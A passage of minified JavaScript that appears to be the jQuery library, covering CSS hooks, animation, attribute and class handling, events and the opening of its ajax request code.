d=a.getComputedStyle(h);b="1%"!==d.top,f="2px"===d.marginLeft,c="4px"===d.width,h.style.marginRight="50%",e="4px"===d.marginRight,Ea.removeChild(g)}n.extend(l,{pixelPosition:function(){return i(),b},boxSizingReliable:function(){return null==c&&i(),c},pixelMarginRight:function(){return null==c&&i(),e},reliableMarginLeft:function(){return null==c&&i(),f},reliableMarginRight:function(){var b,c=h.appendChild(d.createElement("div"));return c.style.cssText=h.style.cssText="-webkit-box-sizing:content-box;box-sizing:content-box;display:block;margin:0;border:0;padding:0",c.style.marginRight=c.style.width="0",h.style.width="1px",Ea.appendChild(g),b=!parseFloat(a.getComputedStyle(c).marginRight),Ea.removeChild(g),h.removeChild(c),b}})}}();function Fa(a,b,c){var d,e,f,g,h=a.style;return c=c||Ca(a),g=c?c.getPropertyValue(b)||c[b]:void 0,""!==g&&void 0!==g||n.contains(a.ownerDocument,a)||(g=n.style(a,b)),c&&!l.pixelMarginRight()&&Ba.test(g)&&Aa.test(b)&&(d=h.width,e=h.minWidth,f=h.maxWidth,h.minWidth=h.maxWidth=h.width=g,g=c.width,h.width=d,h.minWidth=e,h.maxWidth=f),void 0!==g?g+"":g}function Ga(a,b){return{get:function(){return a()?void delete this.get:(this.get=b).apply(this,arguments)}}}var Ha=/^(none|table(?!-c[ea]).+)/,Ia={position:"absolute",visibility:"hidden",display:"block"},Ja={letterSpacing:"0",fontWeight:"400"},Ka=["Webkit","O","Moz","ms"],La=d.createElement("div").style;function Ma(a){if(a in La)return a;var b=a[0].toUpperCase()+a.slice(1),c=Ka.length;while(c--)if(a=Ka[c]+b,a in La)return a}function Na(a,b,c){var d=T.exec(b);return d?Math.max(0,d[2]-(c||0))+(d[3]||"px"):b}function Oa(a,b,c,d,e){for(var f=c===(d?"border":"content")?4:"width"===b?1:0,g=0;4>f;f+=2)"margin"===c&&(g+=n.css(a,c+U[f],!0,e)),d?("content"===c&&(g-=n.css(a,"padding"+U[f],!0,e)),"margin"!==c&&(g-=n.css(a,"border"+U[f]+"Width",!0,e))):(g+=n.css(a,"padding"+U[f],!0,e),"padding"!==c&&(g+=n.css(a,"border"+U[f]+"Width",!0,e)));return g}function Pa(b,c,e){var f=!0,g="width"===c?b.offsetWidth:b.offsetHeight,h=Ca(b),i="border-box"===n.css(b,"boxSizing",!1,h);if(d.msFullscreenElement&&a.top!==a&&b.getClientRects().length&&(g=Math.round(100*b.getBoundingClientRect()[c])),0>=g||null==g){if(g=Fa(b,c,h),(0>g||null==g)&&(g=b.style[c]),Ba.test(g))return g;f=i&&(l.boxSizingReliable()||g===b.style[c]),g=parseFloat(g)||0}return g+Oa(b,c,e||(i?"border":"content"),f,h)+"px"}function Qa(a,b){for(var c,d,e,f=[],g=0,h=a.length;h>g;g++)d=a[g],d.style&&(f[g]=N.get(d,"olddisplay"),c=d.style.display,b?(f[g]||"none"!==c||(d.style.display=""),""===d.style.display&&V(d)&&(f[g]=N.access(d,"olddisplay",za(d.nodeName)))):(e=V(d),"none"===c&&e||N.set(d,"olddisplay",e?c:n.css(d,"display"))));for(g=0;h>g;g++)d=a[g],d.style&&(b&&"none"!==d.style.display&&""!==d.style.display||(d.style.display=b?f[g]||"":"none"));return a}n.extend({cssHooks:{opacity:{get:function(a,b){if(b){var c=Fa(a,"opacity");return""===c?"1":c}}}},cssNumber:{animationIterationCount:!0,columnCount:!0,fillOpacity:!0,flexGrow:!0,flexShrink:!0,fontWeight:!0,lineHeight:!0,opacity:!0,order:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":"cssFloat"},style:function(a,b,c,d){if(a&&3!==a.nodeType&&8!==a.nodeType&&a.style){var e,f,g,h=n.camelCase(b),i=a.style;return b=n.cssProps[h]||(n.cssProps[h]=Ma(h)||h),g=n.cssHooks[b]||n.cssHooks[h],void 0===c?g&&"get"in g&&void 0!==(e=g.get(a,!1,d))?e:i[b]:(f=typeof c,"string"===f&&(e=T.exec(c))&&e[1]&&(c=W(a,b,e),f="number"),null!=c&&c===c&&("number"===f&&(c+=e&&e[3]||(n.cssNumber[h]?"":"px")),l.clearCloneStyle||""!==c||0!==b.indexOf("background")||(i[b]="inherit"),g&&"set"in g&&void 0===(c=g.set(a,c,d))||(i[b]=c)),void 0)}},css:function(a,b,c,d){var e,f,g,h=n.camelCase(b);return b=n.cssProps[h]||(n.cssProps[h]=Ma(h)||h),g=n.cssHooks[b]||n.cssHooks[h],g&&"get"in g&&(e=g.get(a,!0,c)),void 0===e&&(e=Fa(a,b,d)),"normal"===e&&b in Ja&&(e=Ja[b]),""===c||c?(f=parseFloat(e),c===!0||isFinite(f)?f||0:e):e}}),n.each(["height","width"],function(a,b){n.cssHooks[b]={get:function(a,c,d){return c?Ha.test(n.css(a,"display"))&&0===a.offsetWidth?Da(a,Ia,function(){return Pa(a,b,d)}):Pa(a,b,d):void 0},set:function(a,c,d){var e,f=d&&Ca(a),g=d&&Oa(a,b,d,"border-box"===n.css(a,"boxSizing",!1,f),f);return g&&(e=T.exec(c))&&"px"!==(e[3]||"px")&&(a.style[b]=c,c=n.css(a,b)),Na(a,c,g)}}}),n.cssHooks.marginLeft=Ga(l.reliableMarginLeft,function(a,b){return b?(parseFloat(Fa(a,"marginLeft"))||a.getBoundingClientRect().left-Da(a,{marginLeft:0},function(){return a.getBoundingClientRect().left}))+"px":void 0}),n.cssHooks.marginRight=Ga(l.reliableMarginRight,function(a,b){return b?Da(a,{display:"inline-block"},Fa,[a,"marginRight"]):void 0}),n.each({margin:"",padding:"",border:"Width"},function(a,b){n.cssHooks[a+b]={expand:function(c){for(var d=0,e={},f="string"==typeof c?c.split(" "):[c];4>d;d++)e[a+U[d]+b]=f[d]||f[d-2]||f[0];return e}},Aa.test(a)||(n.cssHooks[a+b].set=Na)}),n.fn.extend({css:function(a,b){return K(this,function(a,b,c){var d,e,f={},g=0;if(n.isArray(b)){for(d=Ca(a),e=b.length;e>g;g++)f[b[g]]=n.css(a,b[g],!1,d);return f}return void 0!==c?n.style(a,b,c):n.css(a,b)},a,b,arguments.length>1)},show:function(){return Qa(this,!0)},hide:function(){return Qa(this)},toggle:function(a){return"boolean"==typeof a?a?this.show():this.hide():this.each(function(){V(this)?n(this).show():n(this).hide()})}});function Ra(a,b,c,d,e){return new Ra.prototype.init(a,b,c,d,e)}n.Tween=Ra,Ra.prototype={constructor:Ra,init:function(a,b,c,d,e,f){this.elem=a,this.prop=c,this.easing=e||n.easing._default,this.options=b,this.start=this.now=this.cur(),this.end=d,this.unit=f||(n.cssNumber[c]?"":"px")},cur:function(){var a=Ra.propHooks[this.prop];return a&&a.get?a.get(this):Ra.propHooks._default.get(this)},run:function(a){var b,c=Ra.propHooks[this.prop];return this.options.duration?this.pos=b=n.easing[this.easing](a,this.options.duration*a,0,1,this.options.duration):this.pos=b=a,this.now=(this.end-this.start)*b+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),c&&c.set?c.set(this):Ra.propHooks._default.set(this),this}},Ra.prototype.init.prototype=Ra.prototype,Ra.propHooks={_default:{get:function(a){var b;return 1!==a.elem.nodeType||null!=a.elem[a.prop]&&null==a.elem.style[a.prop]?a.elem[a.prop]:(b=n.css(a.elem,a.prop,""),b&&"auto"!==b?b:0)},set:function(a){n.fx.step[a.prop]?n.fx.step[a.prop](a):1!==a.elem.nodeType||null==a.elem.style[n.cssProps[a.prop]]&&!n.cssHooks[a.prop]?a.elem[a.prop]=a.now:n.style(a.elem,a.prop,a.now+a.unit)}}},Ra.propHooks.scrollTop=Ra.propHooks.scrollLeft={set:function(a){a.elem.nodeType&&a.elem.parentNode&&(a.elem[a.prop]=a.now)}},n.easing={linear:function(a){return a},swing:function(a){return.5-Math.cos(a*Math.PI)/2},_default:"swing"},n.fx=Ra.prototype.init,n.fx.step={};var Sa,Ta,Ua=/^(?:toggle|show|hide)$/,Va=/queueHooks$/;function Wa(){return a.setTimeout(function(){Sa=void 0}),Sa=n.now()}function Xa(a,b){var c,d=0,e={height:a};for(b=b?1:0;4>d;d+=2-b)c=U[d],e["margin"+c]=e["padding"+c]=a;return b&&(e.opacity=e.width=a),e}function Ya(a,b,c){for(var d,e=(_a.tweeners[b]||[]).concat(_a.tweeners["*"]),f=0,g=e.length;g>f;f++)if(d=e[f].call(c,b,a))return d}function Za(a,b,c){var d,e,f,g,h,i,j,k,l=this,m={},o=a.style,p=a.nodeType&&V(a),q=N.get(a,"fxshow");c.queue||(h=n._queueHooks(a,"fx"),null==h.unqueued&&(h.unqueued=0,i=h.empty.fire,h.empty.fire=function(){h.unqueued||i()}),h.unqueued++,l.always(function(){l.always(function(){h.unqueued--,n.queue(a,"fx").length||h.empty.fire()})})),1===a.nodeType&&("height"in b||"width"in b)&&(c.overflow=[o.overflow,o.overflowX,o.overflowY],j=n.css(a,"display"),k="none"===j?N.get(a,"olddisplay")||za(a.nodeName):j,"inline"===k&&"none"===n.css(a,"float")&&(o.display="inline-block")),c.overflow&&(o.overflow="hidden",l.always(function(){o.overflow=c.overflow[0],o.overflowX=c.overflow[1],o.overflowY=c.overflow[2]}));for(d in b)if(e=b[d],Ua.exec(e)){if(delete b[d],f=f||"toggle"===e,e===(p?"hide":"show")){if("show"!==e||!q||void 0===q[d])continue;p=!0}m[d]=q&&q[d]||n.style(a,d)}else j=void 0;if(n.isEmptyObject(m))"inline"===("none"===j?za(a.nodeName):j)&&(o.display=j);else{q?"hidden"in q&&(p=q.hidden):q=N.access(a,"fxshow",{}),f&&(q.hidden=!p),p?n(a).show():l.done(function(){n(a).hide()}),l.done(function(){var b;N.remove(a,"fxshow");for(b in m)n.style(a,b,m[b])});for(d in m)g=Ya(p?q[d]:0,d,l),d in q||(q[d]=g.start,p&&(g.end=g.start,g.start="width"===d||"height"===d?1:0))}}function $a(a,b){var c,d,e,f,g;for(c in a)if(d=n.camelCase(c),e=b[d],f=a[c],n.isArray(f)&&(e=f[1],f=a[c]=f[0]),c!==d&&(a[d]=f,delete a[c]),g=n.cssHooks[d],g&&"expand"in g){f=g.expand(f),delete a[d];for(c in f)c in a||(a[c]=f[c],b[c]=e)}else b[d]=e}function _a(a,b,c){var d,e,f=0,g=_a.prefilters.length,h=n.Deferred().always(function(){delete i.elem}),i=function(){if(e)return!1;for(var b=Sa||Wa(),c=Math.max(0,j.startTime+j.duration-b),d=c/j.duration||0,f=1-d,g=0,i=j.tweens.length;i>g;g++)j.tweens[g].run(f);return h.notifyWith(a,[j,f,c]),1>f&&i?c:(h.resolveWith(a,[j]),!1)},j=h.promise({elem:a,props:n.extend({},b),opts:n.extend(!0,{specialEasing:{},easing:n.easing._default},c),originalProperties:b,originalOptions:c,startTime:Sa||Wa(),duration:c.duration,tweens:[],createTween:function(b,c){var d=n.Tween(a,j.opts,b,c,j.opts.specialEasing[b]||j.opts.easing);return j.tweens.push(d),d},stop:function(b){var c=0,d=b?j.tweens.length:0;if(e)return this;for(e=!0;d>c;c++)j.tweens[c].run(1);return b?(h.notifyWith(a,[j,1,0]),h.resolveWith(a,[j,b])):h.rejectWith(a,[j,b]),this}}),k=j.props;for($a(k,j.opts.specialEasing);g>f;f++)if(d=_a.prefilters[f].call(j,a,k,j.opts))return n.isFunction(d.stop)&&(n._queueHooks(j.elem,j.opts.queue).stop=n.proxy(d.stop,d)),d;return n.map(k,Ya,j),n.isFunction(j.opts.start)&&j.opts.start.call(a,j),n.fx.timer(n.extend(i,{elem:a,anim:j,queue:j.opts.queue})),j.progress(j.opts.progress).done(j.opts.done,j.opts.complete).fail(j.opts.fail).always(j.opts.always)}n.Animation=n.extend(_a,{tweeners:{"*":[function(a,b){var c=this.createTween(a,b);return W(c.elem,a,T.exec(b),c),c}]},tweener:function(a,b){n.isFunction(a)?(b=a,a=["*"]):a=a.match(G);for(var c,d=0,e=a.length;e>d;d++)c=a[d],_a.tweeners[c]=_a.tweeners[c]||[],_a.tweeners[c].unshift(b)},prefilters:[Za],prefilter:function(a,b){b?_a.prefilters.unshift(a):_a.prefilters.push(a)}}),n.speed=function(a,b,c){var d=a&&"object"==typeof a?n.extend({},a):{complete:c||!c&&b||n.isFunction(a)&&a,duration:a,easing:c&&b||b&&!n.isFunction(b)&&b};return d.duration=n.fx.off?0:"number"==typeof d.duration?d.duration:d.duration in n.fx.speeds?n.fx.speeds[d.duration]:n.fx.speeds._default,null!=d.queue&&d.queue!==!0||(d.queue="fx"),d.old=d.complete,d.complete=function(){n.isFunction(d.old)&&d.old.call(this),d.queue&&n.dequeue(this,d.queue)},d},n.fn.extend({fadeTo:function(a,b,c,d){return this.filter(V).css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){var e=n.isEmptyObject(a),f=n.speed(b,c,d),g=function(){var b=_a(this,n.extend({},a),f);(e||N.get(this,"finish"))&&b.stop(!0)};return g.finish=g,e||f.queue===!1?this.each(g):this.queue(f.queue,g)},stop:function(a,b,c){var d=function(a){var b=a.stop;delete a.stop,b(c)};return"string"!=typeof a&&(c=b,b=a,a=void 0),b&&a!==!1&&this.queue(a||"fx",[]),this.each(function(){var b=!0,e=null!=a&&a+"queueHooks",f=n.timers,g=N.get(this);if(e)g[e]&&g[e].stop&&d(g[e]);else for(e in g)g[e]&&g[e].stop&&Va.test(e)&&d(g[e]);for(e=f.length;e--;)f[e].elem!==this||null!=a&&f[e].queue!==a||(f[e].anim.stop(c),b=!1,f.splice(e,1));!b&&c||n.dequeue(this,a)})},finish:function(a){return a!==!1&&(a=a||"fx"),this.each(function(){var b,c=N.get(this),d=c[a+"queue"],e=c[a+"queueHooks"],f=n.timers,g=d?d.length:0;for(c.finish=!0,n.queue(this,a,[]),e&&e.stop&&e.stop.call(this,!0),b=f.length;b--;)f[b].elem===this&&f[b].queue===a&&(f[b].anim.stop(!0),f.splice(b,1));for(b=0;g>b;b++)d[b]&&d[b].finish&&d[b].finish.call(this);delete c.finish})}}),n.each(["toggle","show","hide"],function(a,b){var c=n.fn[b];n.fn[b]=function(a,d,e){return null==a||"boolean"==typeof a?c.apply(this,arguments):this.animate(Xa(b,!0),a,d,e)}}),n.each({slideDown:Xa("show"),slideUp:Xa("hide"),slideToggle:Xa("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){n.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),n.timers=[],n.fx.tick=function(){var a,b=0,c=n.timers;for(Sa=n.now();b<c.length;b++)a=c[b],a()||c[b]!==a||c.splice(b--,1);c.length||n.fx.stop(),Sa=void 0},n.fx.timer=function(a){n.timers.push(a),a()?n.fx.start():n.timers.pop()},n.fx.interval=13,n.fx.start=function(){Ta||(Ta=a.setInterval(n.fx.tick,n.fx.interval))},n.fx.stop=function(){a.clearInterval(Ta),Ta=null},n.fx.speeds={slow:600,fast:200,_default:400},n.fn.delay=function(b,c){return b=n.fx?n.fx.speeds[b]||b:b,c=c||"fx",this.queue(c,function(c,d){var e=a.setTimeout(c,b);d.stop=function(){a.clearTimeout(e)}})},function(){var a=d.createElement("input"),b=d.createElement("select"),c=b.appendChild(d.createElement("option"));a.type="checkbox",l.checkOn=""!==a.value,l.optSelected=c.selected,b.disabled=!0,l.optDisabled=!c.disabled,a=d.createElement("input"),a.value="t",a.type="radio",l.radioValue="t"===a.value}();var ab,bb=n.expr.attrHandle;n.fn.extend({attr:function(a,b){return K(this,n.attr,a,b,arguments.length>1)},removeAttr:function(a){return this.each(function(){n.removeAttr(this,a)})}}),n.extend({attr:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return"undefined"==typeof a.getAttribute?n.prop(a,b,c):(1===f&&n.isXMLDoc(a)||(b=b.toLowerCase(),e=n.attrHooks[b]||(n.expr.match.bool.test(b)?ab:void 0)),void 0!==c?null===c?void n.removeAttr(a,b):e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:(a.setAttribute(b,c+""),c):e&&"get"in e&&null!==(d=e.get(a,b))?d:(d=n.find.attr(a,b),null==d?void 0:d))},attrHooks:{type:{set:function(a,b){if(!l.radioValue&&"radio"===b&&n.nodeName(a,"input")){var c=a.value;return a.setAttribute("type",b),c&&(a.value=c),b}}}},removeAttr:function(a,b){var c,d,e=0,f=b&&b.match(G);if(f&&1===a.nodeType)while(c=f[e++])d=n.propFix[c]||c,n.expr.match.bool.test(c)&&(a[d]=!1),a.removeAttribute(c)}}),ab={set:function(a,b,c){return b===!1?n.removeAttr(a,c):a.setAttribute(c,c),c}},n.each(n.expr.match.bool.source.match(/\w+/g),function(a,b){var c=bb[b]||n.find.attr;bb[b]=function(a,b,d){var e,f;return d||(f=bb[b],bb[b]=e,e=null!=c(a,b,d)?b.toLowerCase():null,bb[b]=f),e}});var cb=/^(?:input|select|textarea|button)$/i,db=/^(?:a|area)$/i;n.fn.extend({prop:function(a,b){return K(this,n.prop,a,b,arguments.length>1)},removeProp:function(a){return this.each(function(){delete this[n.propFix[a]||a]})}}),n.extend({prop:function(a,b,c){var d,e,f=a.nodeType;if(3!==f&&8!==f&&2!==f)return 1===f&&n.isXMLDoc(a)||(b=n.propFix[b]||b,
4 | e=n.propHooks[b]),void 0!==c?e&&"set"in e&&void 0!==(d=e.set(a,c,b))?d:a[b]=c:e&&"get"in e&&null!==(d=e.get(a,b))?d:a[b]},propHooks:{tabIndex:{get:function(a){var b=n.find.attr(a,"tabindex");return b?parseInt(b,10):cb.test(a.nodeName)||db.test(a.nodeName)&&a.href?0:-1}}},propFix:{"for":"htmlFor","class":"className"}}),l.optSelected||(n.propHooks.selected={get:function(a){var b=a.parentNode;return b&&b.parentNode&&b.parentNode.selectedIndex,null},set:function(a){var b=a.parentNode;b&&(b.selectedIndex,b.parentNode&&b.parentNode.selectedIndex)}}),n.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){n.propFix[this.toLowerCase()]=this});var eb=/[\t\r\n\f]/g;function fb(a){return a.getAttribute&&a.getAttribute("class")||""}n.fn.extend({addClass:function(a){var b,c,d,e,f,g,h,i=0;if(n.isFunction(a))return this.each(function(b){n(this).addClass(a.call(this,b,fb(this)))});if("string"==typeof a&&a){b=a.match(G)||[];while(c=this[i++])if(e=fb(c),d=1===c.nodeType&&(" "+e+" ").replace(eb," ")){g=0;while(f=b[g++])d.indexOf(" "+f+" ")<0&&(d+=f+" ");h=n.trim(d),e!==h&&c.setAttribute("class",h)}}return this},removeClass:function(a){var b,c,d,e,f,g,h,i=0;if(n.isFunction(a))return this.each(function(b){n(this).removeClass(a.call(this,b,fb(this)))});if(!arguments.length)return this.attr("class","");if("string"==typeof a&&a){b=a.match(G)||[];while(c=this[i++])if(e=fb(c),d=1===c.nodeType&&(" "+e+" ").replace(eb," ")){g=0;while(f=b[g++])while(d.indexOf(" "+f+" ")>-1)d=d.replace(" "+f+" "," ");h=n.trim(d),e!==h&&c.setAttribute("class",h)}}return this},toggleClass:function(a,b){var c=typeof a;return"boolean"==typeof b&&"string"===c?b?this.addClass(a):this.removeClass(a):n.isFunction(a)?this.each(function(c){n(this).toggleClass(a.call(this,c,fb(this),b),b)}):this.each(function(){var b,d,e,f;if("string"===c){d=0,e=n(this),f=a.match(G)||[];while(b=f[d++])e.hasClass(b)?e.removeClass(b):e.addClass(b)}else void 0!==a&&"boolean"!==c||(b=fb(this),b&&N.set(this,"__className__",b),this.setAttribute&&this.setAttribute("class",b||a===!1?"":N.get(this,"__className__")||""))})},hasClass:function(a){var b,c,d=0;b=" "+a+" ";while(c=this[d++])if(1===c.nodeType&&(" "+fb(c)+" ").replace(eb," ").indexOf(b)>-1)return!0;return!1}});var gb=/\r/g,hb=/[\x20\t\r\n\f]+/g;n.fn.extend({val:function(a){var b,c,d,e=this[0];{if(arguments.length)return d=n.isFunction(a),this.each(function(c){var e;1===this.nodeType&&(e=d?a.call(this,c,n(this).val()):a,null==e?e="":"number"==typeof e?e+="":n.isArray(e)&&(e=n.map(e,function(a){return null==a?"":a+""})),b=n.valHooks[this.type]||n.valHooks[this.nodeName.toLowerCase()],b&&"set"in b&&void 0!==b.set(this,e,"value")||(this.value=e))});if(e)return b=n.valHooks[e.type]||n.valHooks[e.nodeName.toLowerCase()],b&&"get"in b&&void 0!==(c=b.get(e,"value"))?c:(c=e.value,"string"==typeof c?c.replace(gb,""):null==c?"":c)}}}),n.extend({valHooks:{option:{get:function(a){var b=n.find.attr(a,"value");return null!=b?b:n.trim(n.text(a)).replace(hb," ")}},select:{get:function(a){for(var b,c,d=a.options,e=a.selectedIndex,f="select-one"===a.type||0>e,g=f?null:[],h=f?e+1:d.length,i=0>e?h:f?e:0;h>i;i++)if(c=d[i],(c.selected||i===e)&&(l.optDisabled?!c.disabled:null===c.getAttribute("disabled"))&&(!c.parentNode.disabled||!n.nodeName(c.parentNode,"optgroup"))){if(b=n(c).val(),f)return b;g.push(b)}return g},set:function(a,b){var c,d,e=a.options,f=n.makeArray(b),g=e.length;while(g--)d=e[g],(d.selected=n.inArray(n.valHooks.option.get(d),f)>-1)&&(c=!0);return c||(a.selectedIndex=-1),f}}}}),n.each(["radio","checkbox"],function(){n.valHooks[this]={set:function(a,b){return n.isArray(b)?a.checked=n.inArray(n(a).val(),b)>-1:void 0}},l.checkOn||(n.valHooks[this].get=function(a){return null===a.getAttribute("value")?"on":a.value})});var ib=/^(?:focusinfocus|focusoutblur)$/;n.extend(n.event,{trigger:function(b,c,e,f){var g,h,i,j,l,m,o,p=[e||d],q=k.call(b,"type")?b.type:b,r=k.call(b,"namespace")?b.namespace.split("."):[];if(h=i=e=e||d,3!==e.nodeType&&8!==e.nodeType&&!ib.test(q+n.event.triggered)&&(q.indexOf(".")>-1&&(r=q.split("."),q=r.shift(),r.sort()),l=q.indexOf(":")<0&&"on"+q,b=b[n.expando]?b:new n.Event(q,"object"==typeof b&&b),b.isTrigger=f?2:3,b.namespace=r.join("."),b.rnamespace=b.namespace?new RegExp("(^|\\.)"+r.join("\\.(?:.*\\.|)")+"(\\.|$)"):null,b.result=void 0,b.target||(b.target=e),c=null==c?[b]:n.makeArray(c,[b]),o=n.event.special[q]||{},f||!o.trigger||o.trigger.apply(e,c)!==!1)){if(!f&&!o.noBubble&&!n.isWindow(e)){for(j=o.delegateType||q,ib.test(j+q)||(h=h.parentNode);h;h=h.parentNode)p.push(h),i=h;i===(e.ownerDocument||d)&&p.push(i.defaultView||i.parentWindow||a)}g=0;while((h=p[g++])&&!b.isPropagationStopped())b.type=g>1?j:o.bindType||q,m=(N.get(h,"events")||{})[b.type]&&N.get(h,"handle"),m&&m.apply(h,c),m=l&&h[l],m&&m.apply&&L(h)&&(b.result=m.apply(h,c),b.result===!1&&b.preventDefault());return b.type=q,f||b.isDefaultPrevented()||o._default&&o._default.apply(p.pop(),c)!==!1||!L(e)||l&&n.isFunction(e[q])&&!n.isWindow(e)&&(i=e[l],i&&(e[l]=null),n.event.triggered=q,e[q](),n.event.triggered=void 0,i&&(e[l]=i)),b.result}},simulate:function(a,b,c){var d=n.extend(new n.Event,c,{type:a,isSimulated:!0});n.event.trigger(d,null,b),d.isDefaultPrevented()&&c.preventDefault()}}),n.fn.extend({trigger:function(a,b){return this.each(function(){n.event.trigger(a,b,this)})},triggerHandler:function(a,b){var c=this[0];return c?n.event.trigger(a,b,c,!0):void 0}}),n.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(a,b){n.fn[b]=function(a,c){return arguments.length>0?this.on(b,null,a,c):this.trigger(b)}}),n.fn.extend({hover:function(a,b){return this.mouseenter(a).mouseleave(b||a)}}),l.focusin="onfocusin"in a,l.focusin||n.each({focus:"focusin",blur:"focusout"},function(a,b){var c=function(a){n.event.simulate(b,a.target,n.event.fix(a))};n.event.special[b]={setup:function(){var d=this.ownerDocument||this,e=N.access(d,b);e||d.addEventListener(a,c,!0),N.access(d,b,(e||0)+1)},teardown:function(){var d=this.ownerDocument||this,e=N.access(d,b)-1;e?N.access(d,b,e):(d.removeEventListener(a,c,!0),N.remove(d,b))}}});var jb=a.location,kb=n.now(),lb=/\?/;n.parseJSON=function(a){return JSON.parse(a+"")},n.parseXML=function(b){var c;if(!b||"string"!=typeof b)return null;try{c=(new a.DOMParser).parseFromString(b,"text/xml")}catch(d){c=void 0}return c&&!c.getElementsByTagName("parsererror").length||n.error("Invalid XML: "+b),c};var mb=/#.*$/,nb=/([?&])_=[^&]*/,ob=/^(.*?):[ \t]*([^\r\n]*)$/gm,pb=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,qb=/^(?:GET|HEAD)$/,rb=/^\/\//,sb={},tb={},ub="*/".concat("*"),vb=d.createElement("a");vb.href=jb.href;function wb(a){return function(b,c){"string"!=typeof b&&(c=b,b="*");var d,e=0,f=b.toLowerCase().match(G)||[];if(n.isFunction(c))while(d=f[e++])"+"===d[0]?(d=d.slice(1)||"*",(a[d]=a[d]||[]).unshift(c)):(a[d]=a[d]||[]).push(c)}}function xb(a,b,c,d){var e={},f=a===tb;function g(h){var i;return e[h]=!0,n.each(a[h]||[],function(a,h){var j=h(b,c,d);return"string"!=typeof j||f||e[j]?f?!(i=j):void 0:(b.dataTypes.unshift(j),g(j),!1)}),i}return g(b.dataTypes[0])||!e["*"]&&g("*")}function yb(a,b){var c,d,e=n.ajaxSettings.flatOptions||{};for(c in b)void 0!==b[c]&&((e[c]?a:d||(d={}))[c]=b[c]);return d&&n.extend(!0,a,d),a}function zb(a,b,c){var d,e,f,g,h=a.contents,i=a.dataTypes;while("*"===i[0])i.shift(),void 0===d&&(d=a.mimeType||b.getResponseHeader("Content-Type"));if(d)for(e in h)if(h[e]&&h[e].test(d)){i.unshift(e);break}if(i[0]in c)f=i[0];else{for(e in c){if(!i[0]||a.converters[e+" "+i[0]]){f=e;break}g||(g=e)}f=f||g}return f?(f!==i[0]&&i.unshift(f),c[f]):void 0}function Ab(a,b,c,d){var e,f,g,h,i,j={},k=a.dataTypes.slice();if(k[1])for(g in a.converters)j[g.toLowerCase()]=a.converters[g];f=k.shift();while(f)if(a.responseFields[f]&&(c[a.responseFields[f]]=b),!i&&d&&a.dataFilter&&(b=a.dataFilter(b,a.dataType)),i=f,f=k.shift())if("*"===f)f=i;else if("*"!==i&&i!==f){if(g=j[i+" "+f]||j["* "+f],!g)for(e in j)if(h=e.split(" "),h[1]===f&&(g=j[i+" "+h[0]]||j["* "+h[0]])){g===!0?g=j[e]:j[e]!==!0&&(f=h[0],k.unshift(h[1]));break}if(g!==!0)if(g&&a["throws"])b=g(b);else try{b=g(b)}catch(l){return{state:"parsererror",error:g?l:"No conversion from "+i+" to "+f}}}return{state:"success",data:b}}n.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:jb.href,type:"GET",isLocal:pb.test(jb.protocol),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":ub,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/\bxml\b/,html:/\bhtml/,json:/\bjson\b/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":n.parseJSON,"text xml":n.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(a,b){return b?yb(yb(a,n.ajaxSettings),b):yb(n.ajaxSettings,a)},ajaxPrefilter:wb(sb),ajaxTransport:wb(tb),ajax:function(b,c){"object"==typeof b&&(c=b,b=void 0),c=c||{};var e,f,g,h,i,j,k,l,m=n.ajaxSetup({},c),o=m.context||m,p=m.context&&(o.nodeType||o.jquery)?n(o):n.event,q=n.Deferred(),r=n.Callbacks("once memory"),s=m.statusCode||{},t={},u={},v=0,w="canceled",x={readyState:0,getResponseHeader:function(a){var b;if(2===v){if(!h){h={};while(b=ob.exec(g))h[b[1].toLowerCase()]=b[2]}b=h[a.toLowerCase()]}return null==b?null:b},getAllResponseHeaders:function(){return 2===v?g:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return v||(a=u[c]=u[c]||a,t[a]=b),this},overrideMimeType:function(a){return v||(m.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>v)for(b in a)s[b]=[s[b],a[b]];else x.always(a[x.status]);return this},abort:function(a){var b=a||w;return e&&e.abort(b),z(0,b),this}};if(q.promise(x).complete=r.add,x.success=x.done,x.error=x.fail,m.url=((b||m.url||jb.href)+"").replace(mb,"").replace(rb,jb.protocol+"//"),m.type=c.method||c.type||m.method||m.type,m.dataTypes=n.trim(m.dataType||"*").toLowerCase().match(G)||[""],null==m.crossDomain){j=d.createElement("a");try{j.href=m.url,j.href=j.href,m.crossDomain=vb.protocol+"//"+vb.host!=j.protocol+"//"+j.host}catch(y){m.crossDomain=!0}}if(m.data&&m.processData&&"string"!=typeof m.data&&(m.data=n.param(m.data,m.traditional)),xb(sb,m,c,x),2===v)return x;k=n.event&&m.global,k&&0===n.active++&&n.event.trigger("ajaxStart"),m.type=m.type.toUpperCase(),m.hasContent=!qb.test(m.type),f=m.url,m.hasContent||(m.data&&(f=m.url+=(lb.test(f)?"&":"?")+m.data,delete 